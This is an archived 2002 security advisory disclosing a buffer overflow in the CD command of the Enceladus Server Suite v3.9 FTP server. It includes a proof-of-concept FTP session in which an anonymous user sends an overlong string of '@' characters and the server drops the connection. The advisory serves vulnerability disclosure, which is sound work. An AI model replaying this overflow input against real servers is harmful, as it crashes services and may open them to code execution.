[SecurityOffice] Enceladus Server Suite v3.9 Buffer Overflow Vulnerability

From: Tamer Sahin (tsat_private)
Date: Mon Dec 09 2002 - 10:31:43 PST

  • Next message: Timo Sirainen: "Cyrus SASL library buffer overflows"

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: MD5
    
    - --[ Enceladus Server Suite v3.9 Buffer Overflow Vulnerability ]--
    
    - --[ Type
    
    Buffer Overflow
    
    - --[ Release Date
    
    December 09, 2002
    
    - --[ Product / Vendor
    
    Enceladus Server Suite is an Internet/Intranet lightweight Web and FTP Server for
    Windows, provides secure file sharing on any network. Perfect for Broadband, Cable
    Modem, Small business and Personal Use. You don't have to be an expert to setup
    file sharing or run your own web site and FTP Server. This Server Suite is One of
    the Easiest To Install and Operate.
    
    http://www.mollensoft.com
    
    - --[ Summary
    
    Enceladus Server Suite is vulnerable to a buffer overflow condition. An attacker
    may supply a long sequence of characters as an argument to "CD" command.
    If the length of the supplied string exceeds the size of its input buffer, the
    excess data will overwrite other variables on the stack and the stack frame
     itself. It is possible for a malicious user to craft a request that will result in code
    execution on the vulnerable system.
    
    - --[ Tested
    
    Enceladus Server Suite v3.9 / Windows 2000 sp3
    Enceladus Server Suite v3.9 / Windows 98 SE
    
    - --[ Vulnerable
    
    Enceladus Server Suite v3.9 / Windows 2000 sp3
    Enceladus Server Suite v3.9 / Windows 98 SE
    
    - --[ Analysis
    
    An analysis for this vulnerability exists and is available below.
    
    ==================== SNIP ====================
    
    ts@metacortex:~$ ftp 192.168.10.2
    Connected to 192.168.10.2.
    220 Mollensoft FTP Server Ready.
    Name (192.168.10.2:ts): anonymous
    331 Password required for anonymous.
    Password:
    230 User anonymous logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    500 'EPSV': command not understood.
    227 Entering Passive Mode (192,168,10,2,6,160)
    150 Data connection open for PASV transfer.
    - -rwxr-xr-x  1 User     Group           6468 Feb 17 01:13 index.html
    - -rwxr-xr-x  1 User     Group             70 Oct 31 04:52 readme.txt
    226 Listing complete.
    ftp> cd @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    @@@@@@@@@
    421 Service not available, remote server has closed connection.
    
    ==================== SNIP ====================
    
    - --[ Disclaimer
    
    http://www.securityoffice.net is not responsible for the misuse or illegal use of
    any of the information and/or the software listed on this security advisory.
    
    - --[ Author
    
    Tamer Sahin
    tsat_private
    http://www.securityoffice.net
    
    All our advisories can be viewed at http://www.securityoffice.net/articles/
    
    Please send suggestions, updates, and comments to feedbackat_private
    
    (c) 2002 SecurityOffice
    
    This Security Advisory may be reproduced and distributed, provided that this Security
    Advisory is not modified in any way and is attributed to SecurityOffice and provided
    that such reproduction and distribution is performed for non-commercial purposes.
    
    Tamer Sahin
    http://www.securityoffice.net
    
    -----BEGIN PGP SIGNATURE-----
    Version: 2.6
    
    iQEVAwUAPfThkvpL5ibJRTtBAQHKRgf/T9/Lh7wdZyYxae5kp6CWrZzf9uJUC30Y
    J7Biy38kJNg0yzlO2GLYJmRwYLkNxmD+TqwpGwkmtd5wJUDUDSG2b3viLkPooTAS
    5dyzZtvCWmN5Dar9fn9Bg5SKXrqoSudctRBjCIq7o1rlMof8f1HMuX8yqxaL4tlH
    FUMDQ/duxuJfudwIuoMKC1iZ2goMz3vsq+ZWYJ6VKLs9K2sF5PubOIOniDZCqdcN
    5fKWLAxGPHk+SIo6kKrBvqCbR5dBYJV/OQuMcAfuVxpw9mhfALUR0V4HJltUgiPR
    Ah15TBF3a9lmYZw5X4zBORZTWL+bYHSwimKN1QwgF0BPTXJr5MEa7Q==
    =hHbQ
    -----END PGP SIGNATURE-----
    



    This archive was generated by hypermail 2b30 : Mon Dec 09 2002 - 11:09:15 PST